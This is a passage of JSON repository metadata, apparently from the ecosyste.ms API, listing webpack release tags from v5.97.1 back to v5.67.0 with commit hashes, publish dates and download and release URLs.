bpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0